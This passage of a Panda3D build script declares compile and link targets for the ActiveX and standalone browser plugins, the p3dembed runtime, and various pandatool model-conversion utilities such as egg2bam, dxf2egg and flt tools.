TargetAdd('nppanda3d.plugin', opts=['OPENSSL', 'WINGDI', 'WINUSER', 'WINSHELL', 'WINOLE', 'CARBON'])
#
# DIRECTORY: direct/src/plugin_activex/
#
if (RUNTIME and GetTarget() == 'windows' and PkgSkip("MFC")==0):
OPTS=['DIR:direct/src/plugin_activex', 'RUNTIME', 'ACTIVEX', 'MFC']
DefSymbol('ACTIVEX', '_USRDLL', '')
DefSymbol('ACTIVEX', '_WINDLL', '')
DefSymbol('ACTIVEX', '_AFXDLL', '')
DefSymbol('ACTIVEX', '_MBCS', '')
TargetAdd('P3DActiveX.tlb', opts=OPTS, input='P3DActiveX.idl')
TargetAdd('P3DActiveX.res', opts=OPTS, input='P3DActiveX.rc')
TargetAdd('plugin_activex_p3dactivex_composite1.obj', opts=OPTS, input='p3dactivex_composite1.cxx')
TargetAdd('p3dactivex.ocx', input='plugin_common.obj')
TargetAdd('p3dactivex.ocx', input='plugin_parse_color.obj')
TargetAdd('p3dactivex.ocx', input='plugin_get_twirl_data.obj')
TargetAdd('p3dactivex.ocx', input='plugin_wstring_encode.obj')
TargetAdd('p3dactivex.ocx', input='plugin_activex_p3dactivex_composite1.obj')
TargetAdd('p3dactivex.ocx', input='P3DActiveX.res')
TargetAdd('p3dactivex.ocx', input='P3DActiveX.def', ipath=OPTS)
TargetAdd('p3dactivex.ocx', input='libp3tinyxml.ilb')
TargetAdd('p3dactivex.ocx', opts=['MFC', 'WINSOCK2', 'OPENSSL', 'WINGDI', 'WINUSER'])
#
# DIRECTORY: direct/src/plugin_standalone/
#
if (RUNTIME):
OPTS=['DIR:direct/src/plugin_standalone', 'RUNTIME', 'OPENSSL']
TargetAdd('plugin_standalone_panda3d.obj', opts=OPTS, input='panda3d.cxx')
TargetAdd('plugin_standalone_panda3dBase.obj', opts=OPTS, input='panda3dBase.cxx')
if GetTarget() == 'windows':
panda3d_rc = {"name" : "Panda3D Game Engine Plug-in",
"version" : VERSION,
"description" : "Runs 3-D games and interactive applets",
"filename" : "panda3d.exe",
"mimetype" : "application/x-panda3d",
"extension" : "p3d",
"filedesc" : "Panda3D applet",
"icon" : "panda3d.ico"}
TargetAdd('panda3d.res', opts=OPTS, winrc=panda3d_rc)
TargetAdd('plugin_standalone_panda3dMain.obj', opts=OPTS, input='panda3dMain.cxx')
TargetAdd('panda3d.exe', input='plugin_standalone_panda3d.obj')
TargetAdd('panda3d.exe', input='plugin_standalone_panda3dMain.obj')
TargetAdd('panda3d.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('panda3d.exe', input='plugin_common.obj')
TargetAdd('panda3d.exe', input='plugin_wstring_encode.obj')
if GetTarget() == 'darwin':
TargetAdd('panda3d.exe', input='plugin_find_root_dir_assist.obj')
elif GetTarget() == 'windows':
TargetAdd('panda3d.exe', input='panda3d.res')
TargetAdd('panda3d.exe', input='libpandaexpress.dll')
TargetAdd('panda3d.exe', input='libp3dtoolconfig.dll')
TargetAdd('panda3d.exe', input='libp3dtool.dll')
#TargetAdd('panda3d.exe', input='libp3pystub.lib')
TargetAdd('panda3d.exe', input='libp3tinyxml.ilb')
TargetAdd('panda3d.exe', opts=['NOICON', 'OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'WINSHELL', 'ADVAPI', 'WINSOCK2', 'WINOLE', 'CARBON'])
if (GetTarget() == 'darwin'):
TargetAdd('plugin_standalone_panda3dMac.obj', opts=OPTS, input='panda3dMac.cxx')
TargetAdd('Panda3D.app', input='plugin_standalone_panda3d.obj')
TargetAdd('Panda3D.app', input='plugin_standalone_panda3dMac.obj')
TargetAdd('Panda3D.app', input='plugin_standalone_panda3dBase.obj')
TargetAdd('Panda3D.app', input='plugin_common.obj')
TargetAdd('Panda3D.app', input='plugin_find_root_dir_assist.obj')
TargetAdd('Panda3D.app', input='libpandaexpress.dll')
TargetAdd('Panda3D.app', input='libp3dtoolconfig.dll')
TargetAdd('Panda3D.app', input='libp3dtool.dll')
#TargetAdd('Panda3D.app', input='libp3pystub.lib')
TargetAdd('Panda3D.app', input='libp3tinyxml.ilb')
TargetAdd('Panda3D.app', input='panda3d_mac.plist', ipath=OPTS)
TargetAdd('Panda3D.app', input='models/plugin_images/panda3d.icns')
TargetAdd('Panda3D.app', opts=['OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'WINSHELL', 'ADVAPI', 'WINSOCK2', 'WINOLE', 'CARBON'])
elif (GetTarget() == 'windows'):
TargetAdd('plugin_standalone_panda3dWinMain.obj', opts=OPTS, input='panda3dWinMain.cxx')
TargetAdd('panda3dw.exe', input='plugin_standalone_panda3d.obj')
TargetAdd('panda3dw.exe', input='plugin_standalone_panda3dWinMain.obj')
TargetAdd('panda3dw.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('panda3dw.exe', input='plugin_wstring_encode.obj')
TargetAdd('panda3dw.exe', input='plugin_common.obj')
TargetAdd('panda3dw.exe', input='libpandaexpress.dll')
TargetAdd('panda3dw.exe', input='libp3dtoolconfig.dll')
TargetAdd('panda3dw.exe', input='libp3dtool.dll')
#TargetAdd('panda3dw.exe', input='libp3pystub.lib')
TargetAdd('panda3dw.exe', input='libp3tinyxml.ilb')
TargetAdd('panda3dw.exe', opts=['SUBSYSTEM:WINDOWS', 'OPENSSL', 'ZLIB', 'WINGDI', 'WINUSER', 'WINSHELL', 'ADVAPI', 'WINSOCK2', 'WINOLE', 'CARBON'])
if (RTDIST):
OPTS=['BUILDING:P3D_PLUGIN', 'DIR:direct/src/plugin_standalone', 'DIR:direct/src/plugin', 'DIR:dtool/src/dtoolbase', 'DIR:dtool/src/dtoolutil', 'DIR:dtool/src/pystub', 'DIR:dtool/src/prc', 'DIR:dtool/src/dconfig', 'DIR:panda/src/express', 'DIR:panda/src/downloader', 'RUNTIME', 'P3DEMBED', 'OPENSSL', 'ZLIB']
# This is arguably a big fat ugly hack, but doing it otherwise would complicate the build process considerably.
DefSymbol("P3DEMBED", "LINK_ALL_STATIC", "")
TargetAdd('plugin_standalone_panda3dBase.obj', opts=OPTS, input='panda3dBase.cxx')
TargetAdd('plugin_standalone_p3dEmbedMain.obj', opts=OPTS, input='p3dEmbedMain.cxx')
TargetAdd('plugin_standalone_p3dEmbed.obj', opts=OPTS, input='p3dEmbed.cxx')
#TargetAdd('plugin_standalone_pystub.obj', opts=OPTS, input='pystub.cxx')
TargetAdd('plugin_standalone_dtoolbase_composite1.obj', opts=OPTS, input='p3dtoolbase_composite1.cxx')
TargetAdd('plugin_standalone_dtoolbase_composite2.obj', opts=OPTS, input='p3dtoolbase_composite2.cxx')
TargetAdd('plugin_standalone_lookup3.obj', opts=OPTS, input='lookup3.c')
TargetAdd('plugin_standalone_indent.obj', opts=OPTS, input='indent.cxx')
TargetAdd('plugin_standalone_dtoolutil_composite1.obj', opts=OPTS, input='p3dtoolutil_composite1.cxx')
TargetAdd('plugin_standalone_dtoolutil_composite2.obj', opts=OPTS, input='p3dtoolutil_composite2.cxx')
if (GetTarget() == 'darwin'):
TargetAdd('plugin_standalone_dtoolutil_filename_assist.obj', opts=OPTS, input='filename_assist.mm')
TargetAdd('plugin_standalone_prc_composite1.obj', opts=OPTS, input='p3prc_composite1.cxx')
TargetAdd('plugin_standalone_prc_composite2.obj', opts=OPTS, input='p3prc_composite2.cxx')
TargetAdd('plugin_standalone_dconfig_composite1.obj', opts=OPTS, input='p3dconfig_composite1.cxx')
TargetAdd('plugin_standalone_express_composite1.obj', opts=OPTS, input='p3express_composite1.cxx')
TargetAdd('plugin_standalone_express_composite2.obj', opts=OPTS, input='p3express_composite2.cxx')
TargetAdd('plugin_standalone_downloader_composite1.obj', opts=OPTS, input='p3downloader_composite1.cxx')
TargetAdd('plugin_standalone_downloader_composite2.obj', opts=OPTS, input='p3downloader_composite2.cxx')
TargetAdd('p3dembed.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_p3dEmbedMain.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_p3dEmbed.obj')
#TargetAdd('p3dembed.exe', input='plugin_standalone_pystub.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolbase_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolbase_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_lookup3.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_indent.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolutil_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolutil_composite2.obj')
if GetTarget() == 'darwin':
TargetAdd('p3dembed.exe', input='plugin_standalone_dtoolutil_filename_assist.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_prc_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_prc_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_dconfig_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_express_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_express_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_downloader_composite1.obj')
TargetAdd('p3dembed.exe', input='plugin_standalone_downloader_composite2.obj')
TargetAdd('p3dembed.exe', input='plugin_common.obj')
if GetTarget() == 'darwin':
TargetAdd('p3dembed.exe', input='plugin_find_root_dir_assist.obj')
TargetAdd('p3dembed.exe', input='libp3subprocbuffer.ilb')
TargetAdd('p3dembed.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dembed.exe', input='libp3d_plugin_static.ilb')
TargetAdd('p3dembed.exe', opts=['NOICON', 'WINGDI', 'WINSOCK2', 'ZLIB', 'WINUSER', 'OPENSSL', 'WINOLE', 'CARBON', 'MSIMG', 'WINCOMCTL', 'ADVAPI', 'WINSHELL', 'X11'])
if GetTarget() == 'windows':
OPTS.append("P3DEMBEDW")
DefSymbol("P3DEMBEDW", "P3DEMBEDW", "")
TargetAdd('plugin_standalone_p3dEmbedWinMain.obj', opts=OPTS, input='p3dEmbedMain.cxx')
TargetAdd('p3dembedw.exe', input='plugin_standalone_panda3dBase.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_p3dEmbedWinMain.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_p3dEmbed.obj')
#TargetAdd('p3dembedw.exe', input='plugin_standalone_pystub.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolbase_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolbase_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_lookup3.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_indent.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolutil_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dtoolutil_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_prc_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_prc_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_dconfig_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_express_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_express_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_downloader_composite1.obj')
TargetAdd('p3dembedw.exe', input='plugin_standalone_downloader_composite2.obj')
TargetAdd('p3dembedw.exe', input='plugin_common.obj')
TargetAdd('p3dembedw.exe', input='libp3tinyxml.ilb')
TargetAdd('p3dembedw.exe', input='libp3d_plugin_static.ilb')
TargetAdd('p3dembedw.exe', opts=['SUBSYSTEM:WINDOWS', 'NOICON', 'WINGDI', 'WINSOCK2', 'ZLIB', 'WINUSER', 'OPENSSL', 'WINOLE', 'MSIMG', 'WINCOMCTL', 'ADVAPI', 'WINSHELL'])
#
# DIRECTORY: pandatool/src/pandatoolbase/
#
if (PkgSkip("PANDATOOL")==0):
OPTS=['DIR:pandatool/src/pandatoolbase']
TargetAdd('p3pandatoolbase_composite1.obj', opts=OPTS, input='p3pandatoolbase_composite1.cxx')
TargetAdd('libp3pandatoolbase.lib', input='p3pandatoolbase_composite1.obj')
#
# DIRECTORY: pandatool/src/converter/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/converter']
TargetAdd('p3converter_somethingToEggConverter.obj', opts=OPTS, input='somethingToEggConverter.cxx')
TargetAdd('p3converter_eggToSomethingConverter.obj', opts=OPTS, input='eggToSomethingConverter.cxx')
TargetAdd('libp3converter.lib', input='p3converter_somethingToEggConverter.obj')
TargetAdd('libp3converter.lib', input='p3converter_eggToSomethingConverter.obj')
#
# DIRECTORY: pandatool/src/progbase/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/progbase', 'ZLIB']
TargetAdd('p3progbase_composite1.obj', opts=OPTS, input='p3progbase_composite1.cxx')
TargetAdd('libp3progbase.lib', input='p3progbase_composite1.obj')
#
# DIRECTORY: pandatool/src/eggbase/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/eggbase']
TargetAdd('p3eggbase_composite1.obj', opts=OPTS, input='p3eggbase_composite1.cxx')
TargetAdd('libp3eggbase.lib', input='p3eggbase_composite1.obj')
#
# DIRECTORY: pandatool/src/bam/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/bam']
TargetAdd('bam-info_bamInfo.obj', opts=OPTS, input='bamInfo.cxx')
TargetAdd('bam-info.exe', input='bam-info_bamInfo.obj')
TargetAdd('bam-info.exe', input='libp3progbase.lib')
TargetAdd('bam-info.exe', input='libp3pandatoolbase.lib')
TargetAdd('bam-info.exe', input=COMMON_PANDA_LIBS)
TargetAdd('bam-info.exe', opts=['ADVAPI', 'FFTW'])
if not PkgSkip("EGG"):
TargetAdd('bam2egg_bamToEgg.obj', opts=OPTS, input='bamToEgg.cxx')
TargetAdd('bam2egg.exe', input='bam2egg_bamToEgg.obj')
TargetAdd('bam2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('bam2egg.exe', opts=['ADVAPI', 'FFTW'])
TargetAdd('egg2bam_eggToBam.obj', opts=OPTS, input='eggToBam.cxx')
TargetAdd('egg2bam.exe', input='egg2bam_eggToBam.obj')
TargetAdd('egg2bam.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2bam.exe', opts=['ADVAPI', 'FFTW'])
#
# DIRECTORY: pandatool/src/cvscopy/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/cvscopy']
TargetAdd('p3cvscopy_composite1.obj', opts=OPTS, input='p3cvscopy_composite1.cxx')
TargetAdd('libp3cvscopy.lib', input='p3cvscopy_composite1.obj')
#
# DIRECTORY: pandatool/src/daeegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("FCOLLADA") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/daeegg', 'FCOLLADA']
TargetAdd('p3daeegg_composite1.obj', opts=OPTS, input='p3daeegg_composite1.cxx')
TargetAdd('libp3daeegg.lib', input='p3daeegg_composite1.obj')
TargetAdd('libp3daeegg.lib', opts=['FCOLLADA', 'CARBON'])
#
# DIRECTORY: pandatool/src/assimp
#
if not PkgSkip("PANDATOOL") and not PkgSkip("ASSIMP"):
OPTS=['DIR:pandatool/src/assimp', 'BUILDING:ASSIMP', 'ASSIMP', 'MODULE']
TargetAdd('p3assimp_composite1.obj', opts=OPTS, input='p3assimp_composite1.cxx')
TargetAdd('libp3assimp.dll', input='p3assimp_composite1.obj')
TargetAdd('libp3assimp.dll', input=COMMON_PANDA_LIBS)
TargetAdd('libp3assimp.dll', opts=OPTS+['ZLIB'])
#
# DIRECTORY: pandatool/src/daeprogs/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("FCOLLADA") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/daeprogs', 'FCOLLADA']
TargetAdd('dae2egg_daeToEgg.obj', opts=OPTS, input='daeToEgg.cxx')
TargetAdd('dae2egg.exe', input='dae2egg_daeToEgg.obj')
TargetAdd('dae2egg.exe', input='libp3daeegg.lib')
TargetAdd('dae2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('dae2egg.exe', opts=['WINUSER', 'FCOLLADA', 'CARBON'])
#
# DIRECTORY: pandatool/src/dxf/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/dxf']
TargetAdd('p3dxf_composite1.obj', opts=OPTS, input='p3dxf_composite1.cxx')
TargetAdd('libp3dxf.lib', input='p3dxf_composite1.obj')
#
# DIRECTORY: pandatool/src/dxfegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/dxfegg']
TargetAdd('p3dxfegg_dxfToEggConverter.obj', opts=OPTS, input='dxfToEggConverter.cxx')
TargetAdd('p3dxfegg_dxfToEggLayer.obj', opts=OPTS, input='dxfToEggLayer.cxx')
TargetAdd('libp3dxfegg.lib', input='p3dxfegg_dxfToEggConverter.obj')
TargetAdd('libp3dxfegg.lib', input='p3dxfegg_dxfToEggLayer.obj')
#
# DIRECTORY: pandatool/src/dxfprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/dxfprogs']
TargetAdd('dxf-points_dxfPoints.obj', opts=OPTS, input='dxfPoints.cxx')
TargetAdd('dxf-points.exe', input='dxf-points_dxfPoints.obj')
TargetAdd('dxf-points.exe', input='libp3progbase.lib')
TargetAdd('dxf-points.exe', input='libp3dxf.lib')
TargetAdd('dxf-points.exe', input='libp3pandatoolbase.lib')
TargetAdd('dxf-points.exe', input=COMMON_PANDA_LIBS)
TargetAdd('dxf-points.exe', opts=['ADVAPI', 'FFTW'])
if not PkgSkip("EGG"):
TargetAdd('dxf2egg_dxfToEgg.obj', opts=OPTS, input='dxfToEgg.cxx')
TargetAdd('dxf2egg.exe', input='dxf2egg_dxfToEgg.obj')
TargetAdd('dxf2egg.exe', input='libp3dxfegg.lib')
TargetAdd('dxf2egg.exe', input='libp3dxf.lib')
TargetAdd('dxf2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('dxf2egg.exe', opts=['ADVAPI', 'FFTW'])
TargetAdd('egg2dxf_eggToDXF.obj', opts=OPTS, input='eggToDXF.cxx')
TargetAdd('egg2dxf_eggToDXFLayer.obj', opts=OPTS, input='eggToDXFLayer.cxx')
TargetAdd('egg2dxf.exe', input='egg2dxf_eggToDXF.obj')
TargetAdd('egg2dxf.exe', input='egg2dxf_eggToDXFLayer.obj')
TargetAdd('egg2dxf.exe', input='libp3dxf.lib')
TargetAdd('egg2dxf.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2dxf.exe', opts=['ADVAPI', 'FFTW'])
#
# DIRECTORY: pandatool/src/objegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/objegg']
TargetAdd('p3objegg_objToEggConverter.obj', opts=OPTS, input='objToEggConverter.cxx')
TargetAdd('p3objegg_eggToObjConverter.obj', opts=OPTS, input='eggToObjConverter.cxx')
TargetAdd('p3objegg_config_objegg.obj', opts=OPTS, input='config_objegg.cxx')
TargetAdd('libp3objegg.lib', input='p3objegg_objToEggConverter.obj')
TargetAdd('libp3objegg.lib', input='p3objegg_eggToObjConverter.obj')
TargetAdd('libp3objegg.lib', input='p3objegg_config_objegg.obj')
#
# DIRECTORY: pandatool/src/objprogs/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/objprogs']
TargetAdd('obj2egg_objToEgg.obj', opts=OPTS, input='objToEgg.cxx')
TargetAdd('obj2egg.exe', input='obj2egg_objToEgg.obj')
TargetAdd('obj2egg.exe', input='libp3objegg.lib')
TargetAdd('obj2egg.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2obj_eggToObj.obj', opts=OPTS, input='eggToObj.cxx')
TargetAdd('egg2obj.exe', input='egg2obj_eggToObj.obj')
TargetAdd('egg2obj.exe', input='libp3objegg.lib')
TargetAdd('egg2obj.exe', input=COMMON_EGG2X_LIBS)
#
# DIRECTORY: pandatool/src/palettizer/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/palettizer']
TargetAdd('p3palettizer_composite1.obj', opts=OPTS, input='p3palettizer_composite1.cxx')
TargetAdd('libp3palettizer.lib', input='p3palettizer_composite1.obj')
#
# DIRECTORY: pandatool/src/egg-mkfont/
#
if not PkgSkip("FREETYPE") and not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-mkfont', 'DIR:pandatool/src/palettizer', 'FREETYPE']
TargetAdd('egg-mkfont_eggMakeFont.obj', opts=OPTS, input='eggMakeFont.cxx')
TargetAdd('egg-mkfont_rangeDescription.obj', opts=OPTS, input='rangeDescription.cxx')
TargetAdd('egg-mkfont_rangeIterator.obj', opts=OPTS, input='rangeIterator.cxx')
TargetAdd('egg-mkfont.exe', input='egg-mkfont_eggMakeFont.obj')
TargetAdd('egg-mkfont.exe', input='egg-mkfont_rangeDescription.obj')
TargetAdd('egg-mkfont.exe', input='egg-mkfont_rangeIterator.obj')
TargetAdd('egg-mkfont.exe', input='libp3palettizer.lib')
TargetAdd('egg-mkfont.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-mkfont.exe', opts=['ADVAPI', 'FREETYPE'])
#
# DIRECTORY: pandatool/src/eggcharbase/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/eggcharbase', 'ZLIB']
TargetAdd('p3eggcharbase_composite1.obj', opts=OPTS, input='p3eggcharbase_composite1.cxx')
TargetAdd('libp3eggcharbase.lib', input='p3eggcharbase_composite1.obj')
#
# DIRECTORY: pandatool/src/egg-optchar/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-optchar']
TargetAdd('egg-optchar_config_egg_optchar.obj', opts=OPTS, input='config_egg_optchar.cxx')
TargetAdd('egg-optchar_eggOptchar.obj', opts=OPTS, input='eggOptchar.cxx')
TargetAdd('egg-optchar_eggOptcharUserData.obj', opts=OPTS, input='eggOptcharUserData.cxx')
TargetAdd('egg-optchar_vertexMembership.obj', opts=OPTS, input='vertexMembership.cxx')
TargetAdd('egg-optchar.exe', input='egg-optchar_config_egg_optchar.obj')
TargetAdd('egg-optchar.exe', input='egg-optchar_eggOptchar.obj')
TargetAdd('egg-optchar.exe', input='egg-optchar_eggOptcharUserData.obj')
TargetAdd('egg-optchar.exe', input='egg-optchar_vertexMembership.obj')
TargetAdd('egg-optchar.exe', input='libp3eggcharbase.lib')
TargetAdd('egg-optchar.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-optchar.exe', opts=['ADVAPI', 'FREETYPE'])
#
# DIRECTORY: pandatool/src/egg-palettize/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-palettize', 'DIR:pandatool/src/palettizer']
TargetAdd('egg-palettize_eggPalettize.obj', opts=OPTS, input='eggPalettize.cxx')
TargetAdd('egg-palettize.exe', input='egg-palettize_eggPalettize.obj')
TargetAdd('egg-palettize.exe', input='libp3palettizer.lib')
TargetAdd('egg-palettize.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-palettize.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/egg-qtess/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/egg-qtess']
TargetAdd('egg-qtess_composite1.obj', opts=OPTS, input='egg-qtess_composite1.cxx')
TargetAdd('egg-qtess.exe', input='egg-qtess_composite1.obj')
TargetAdd('egg-qtess.exe', input='libp3eggbase.lib')
TargetAdd('egg-qtess.exe', input='libp3progbase.lib')
TargetAdd('egg-qtess.exe', input='libp3converter.lib')
TargetAdd('egg-qtess.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-qtess.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/eggprogs/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/eggprogs']
TargetAdd('egg-crop_eggCrop.obj', opts=OPTS, input='eggCrop.cxx')
TargetAdd('egg-crop.exe', input='egg-crop_eggCrop.obj')
TargetAdd('egg-crop.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-crop.exe', opts=['ADVAPI'])
TargetAdd('egg-make-tube_eggMakeTube.obj', opts=OPTS, input='eggMakeTube.cxx')
TargetAdd('egg-make-tube.exe', input='egg-make-tube_eggMakeTube.obj')
TargetAdd('egg-make-tube.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-make-tube.exe', opts=['ADVAPI'])
TargetAdd('egg-texture-cards_eggTextureCards.obj', opts=OPTS, input='eggTextureCards.cxx')
TargetAdd('egg-texture-cards.exe', input='egg-texture-cards_eggTextureCards.obj')
TargetAdd('egg-texture-cards.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-texture-cards.exe', opts=['ADVAPI'])
TargetAdd('egg-topstrip_eggTopstrip.obj', opts=OPTS, input='eggTopstrip.cxx')
TargetAdd('egg-topstrip.exe', input='egg-topstrip_eggTopstrip.obj')
TargetAdd('egg-topstrip.exe', input='libp3eggcharbase.lib')
TargetAdd('egg-topstrip.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-topstrip.exe', opts=['ADVAPI'])
TargetAdd('egg-trans_eggTrans.obj', opts=OPTS, input='eggTrans.cxx')
TargetAdd('egg-trans.exe', input='egg-trans_eggTrans.obj')
TargetAdd('egg-trans.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-trans.exe', opts=['ADVAPI'])
TargetAdd('egg2c_eggToC.obj', opts=OPTS, input='eggToC.cxx')
TargetAdd('egg2c.exe', input='egg2c_eggToC.obj')
TargetAdd('egg2c.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg2c.exe', opts=['ADVAPI'])
TargetAdd('egg-rename_eggRename.obj', opts=OPTS, input='eggRename.cxx')
TargetAdd('egg-rename.exe', input='egg-rename_eggRename.obj')
TargetAdd('egg-rename.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-rename.exe', opts=['ADVAPI'])
TargetAdd('egg-retarget-anim_eggRetargetAnim.obj', opts=OPTS, input='eggRetargetAnim.cxx')
TargetAdd('egg-retarget-anim.exe', input='egg-retarget-anim_eggRetargetAnim.obj')
TargetAdd('egg-retarget-anim.exe', input='libp3eggcharbase.lib')
TargetAdd('egg-retarget-anim.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-retarget-anim.exe', opts=['ADVAPI'])
TargetAdd('egg-list-textures_eggListTextures.obj', opts=OPTS, input='eggListTextures.cxx')
TargetAdd('egg-list-textures.exe', input='egg-list-textures_eggListTextures.obj')
TargetAdd('egg-list-textures.exe', input=COMMON_EGG2X_LIBS)
TargetAdd('egg-list-textures.exe', opts=['ADVAPI'])
#
# DIRECTORY: pandatool/src/flt/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/flt', 'ZLIB']
TargetAdd('p3flt_composite1.obj', opts=OPTS, input='p3flt_composite1.cxx')
TargetAdd('libp3flt.lib', input=['p3flt_composite1.obj'])
#
# DIRECTORY: pandatool/src/fltegg/
#
if not PkgSkip("PANDATOOL") and not PkgSkip("EGG"):
OPTS=['DIR:pandatool/src/fltegg']
TargetAdd('p3fltegg_fltToEggConverter.obj', opts=OPTS, input='fltToEggConverter.cxx')
TargetAdd('p3fltegg_fltToEggLevelState.obj', opts=OPTS, input='fltToEggLevelState.cxx')
TargetAdd('libp3fltegg.lib', input=['p3fltegg_fltToEggConverter.obj', 'p3fltegg_fltToEggLevelState.obj'])
#
# DIRECTORY: pandatool/src/fltprogs/
#
if not PkgSkip("PANDATOOL"):
OPTS=['DIR:pandatool/src/fltprogs', 'DIR:pandatool/src/flt', 'DIR:pandatool/src/cvscopy']
TargetAdd('flt-info_fltInfo.obj', opts=OPTS, input='fltInfo.cxx')
TargetAdd('flt-info.exe', input='flt-info_fltInfo.obj')
TargetAdd('flt-info.exe', input='libp3flt.lib')
TargetAdd('flt-info.exe', input='libp3progbase.lib')
TargetAdd('flt-info.exe', input='libp3pandatoolbase.lib')
TargetAdd('flt-info.exe', input=COMMON_PANDA_LIBS)
TargetAdd('flt-info.exe', opts=['ADVAPI'])
TargetAdd('flt-trans_fltTrans.obj', opts=OPTS, input='fltTrans.cxx')
TargetAdd('flt-trans.exe', input='flt-trans_fltTrans.obj')
TargetAdd('flt-trans.exe', input='libp3flt.lib')
TargetAdd('flt-trans.exe', input='libp3progbase.lib')
TargetAdd('flt-trans.exe', input='libp3pandatoolbase.lib')
TargetAdd('flt-trans.exe', input=COMMON_PANDA_LIBS)
TargetAdd('flt-trans.exe', opts=['ADVAPI'])
TargetAdd('fltcopy_fltCopy.obj', opts=OPTS, input='fltCopy.cxx')
TargetAdd('fltcopy.exe', input='fltcopy_fltCopy.obj')
TargetAdd('fltcopy.exe', input='libp3cvscopy.lib')
TargetAdd('fltcopy.exe', input='libp3flt.lib')
TargetAdd('fltcopy.exe', input='libp3progbase.lib')
TargetAdd('fltcopy.exe', input='libp3pandatoolbase.lib')
TargetAdd('fltcopy.exe', input=COMMON_PANDA_LIBS)
TargetAdd('fltcopy.exe', opts=['ADVAPI'])
if not PkgSkip("EGG"):
TargetAdd('egg2flt_eggToFlt.obj', opts=OPTS, input='eggToFlt.cxx')
TargetAdd('egg2flt.exe', input='egg2flt_eggToFlt.obj')
TargetAdd('egg2flt.exe', input='libp3flt.lib')
